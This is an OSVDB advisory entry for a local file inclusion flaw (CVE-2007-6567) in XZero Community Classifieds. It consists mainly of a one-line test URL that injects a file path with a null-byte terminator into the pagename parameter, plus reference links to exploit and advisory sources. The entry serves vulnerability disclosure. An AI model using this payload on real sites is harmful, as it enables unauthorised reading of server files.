XZero Community Classifieds index.php pagename Variable Traversal Local File Inclusion

2007-12-26T00:00:00
ID OSVDB:39741
Type osvdb
Reporter OSVDB
Modified 2007-12-26T00:00:00

Description

Manual Testing Notes

http://[target]/index.php?view=page&pagename=[Local_FIle]%00

References:

Other Advisory URL: http://en.rstzone.org/xzero-community-classifieds-v4-95-11-lfi-sql-in-t9394.rst ISS X-Force ID: 39260 Generic Exploit URL: http://www.milw0rm.com/exploits/4794 CVE-2007-6567 Bugtraq ID: 27041